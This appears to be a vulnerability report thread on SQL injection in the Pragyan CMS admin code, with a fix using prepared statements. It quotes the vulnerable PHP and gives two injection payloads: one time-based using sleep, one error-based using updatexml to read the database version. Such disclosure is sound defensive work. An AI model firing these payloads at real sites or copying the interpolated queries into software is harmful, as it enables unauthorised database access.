```php
function getSuggestions($pattern) {
    // $pattern comes straight from the request (forwhat=...) and is interpolated
    // into the SQL string without escaping or parameter binding.
    $suggestionsQuery = "SELECT IF(user_email LIKE \"$pattern%\", 1, " .
        "IF(`user_fullname` LIKE \"$pattern%\", 2, " .
        "IF(`user_fullname` LIKE \"% $pattern%\", 3, " .
        "IF(`user_email` LIKE \"%$pattern%\", 4, " .
        "IF(`user_fullname` LIKE \"%$pattern%\", 5, 6" .
        "))))) AS `relevance`, `user_email`, `user_fullname` FROM `" . MYSQL_DATABASE_PREFIX . "users` " .
        "WHERE `user_activated`=1 AND(`user_email` LIKE \"%$pattern%\" OR `user_fullname` LIKE \"%$pattern%\" ) ORDER BY `relevance`";
    // echo $suggestionsQuery;
    $suggestionsResult = mysqli_query($GLOBALS["___mysqli_ston"], $suggestionsQuery);
    $suggestions = array($pattern);
    while ($suggestionsRow = mysqli_fetch_row($suggestionsResult)) {
        $suggestions[] = $suggestionsRow[1] . ' - ' . $suggestionsRow[2];
    }
    return join($suggestions, ',');
}
```
There is no filter at all, so we can cause a boolean-based SQL injection. PoC like:

`pragyan/home/+admin&doaction=getsuggestions&forwhat="and sleep(10) and "admin" like "admin`

The second one is in line 252:
```php
function delete_blacklist()
{
    $id = safe_html($_GET['del_black']);
    $query = "DELETE FROM `" . MYSQL_DATABASE_PREFIX . "blacklist` WHERE `id` = '$id'";
    $result = mysqli_query($GLOBALS["___mysqli_ston"], $query)
        or displayerror("Unable to Delete blacklist" . ((is_object($GLOBALS["___mysqli_ston"]))
            ? mysqli_error($GLOBALS["___mysqli_ston"])
            : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)));
    if (mysqli_affected_rows($GLOBALS["___mysqli_ston"]) > 0)
        displayinfo("Blackilist Deleted Successfully");
    return 1;
}
```
function safe_html():

```php
function safe_html($html)
{
    return htmlspecialchars(strip_tags($html));
}
```
htmlspecialchars() has nothing to do with SQL injection, so we can use error-based SQL injection. PoC:

`pragyan/home/+admin&subaction=global&del_black=4'and updatexml(1,concat(0x7e,(select @@version),0x7e),1) and '1'='1`
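Added example, not the project's or the reporter's code: both quoted functions rewritten with mysqli prepared statements, so the request value is bound as a parameter instead of being spliced into the SQL string. It assumes a `$db` mysqli connection handle standing in for `$GLOBALS["___mysqli_ston"]`; `MYSQL_DATABASE_PREFIX` is the constant the original code already uses.

```php
<?php
// Added example, not Pragyan's own code. $db is an assumed mysqli connection
// handle; MYSQL_DATABASE_PREFIX is the constant used by the original code.

function getSuggestionsSafe(mysqli $db, string $pattern): string
{
    // Wildcards are added in PHP, but the value travels as a bound parameter, so
    // quotes or keywords in $pattern cannot alter the query. % _ \ match literally.
    $lit       = addcslashes($pattern, '%_\\');
    $prefix    = $lit . '%';         // "$pattern%"  in the original
    $wordStart = '% ' . $lit . '%';  // "% $pattern%"
    $anywhere  = '%' . $lit . '%';   // "%$pattern%"
    $sql = "SELECT IF(`user_email` LIKE ?, 1, IF(`user_fullname` LIKE ?, 2,"
         . " IF(`user_fullname` LIKE ?, 3, IF(`user_email` LIKE ?, 4,"
         . " IF(`user_fullname` LIKE ?, 5, 6))))) AS `relevance`,"
         . " `user_email`, `user_fullname`"
         . " FROM `" . MYSQL_DATABASE_PREFIX . "users`"
         . " WHERE `user_activated` = 1"
         . " AND (`user_email` LIKE ? OR `user_fullname` LIKE ?)"
         . " ORDER BY `relevance`";
    $stmt = $db->prepare($sql);
    if ($stmt === false) { throw new RuntimeException('prepare failed: ' . $db->error); }
    $stmt->bind_param('sssssss', $prefix, $prefix, $wordStart, $anywhere, $anywhere, $anywhere, $anywhere);
    $stmt->execute();
    // bind_result works without mysqlnd; the three columns match the SELECT list.
    $stmt->bind_result($relevance, $email, $fullname);
    $suggestions = [$pattern];
    while ($stmt->fetch()) {
        $suggestions[] = $email . ' - ' . $fullname;
    }
    $stmt->close();
    return implode(',', $suggestions);
}

function deleteBlacklistSafe(mysqli $db, $rawId): bool
{
    // Type-validate first: the id must be a positive integer. Anything else is
    // rejected before it reaches the database, which also closes the error channel.
    if (filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]) === false) {
        return false;
    }
    $id   = (int) $rawId;
    $stmt = $db->prepare("DELETE FROM `" . MYSQL_DATABASE_PREFIX . "blacklist` WHERE `id` = ?");
    if ($stmt === false) { throw new RuntimeException('prepare failed: ' . $db->error); }
    $stmt->bind_param('i', $id);   // bound as an integer, never as SQL text
    $stmt->execute();
    return $stmt->affected_rows > 0;
}
```

The HTML escaping that safe_html() performs still belongs at output time; it is not a substitute for parameter binding on the query side.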
@suhithr Find someone to fix this -- shouldn't be too tough. ("admin" permissions should only be given to trusted users so the risk shouldn't be too high.)
Both vulnerabilities require logging in as admin. The first is in cms/admin.lib.php, line 358, function getSuggestions.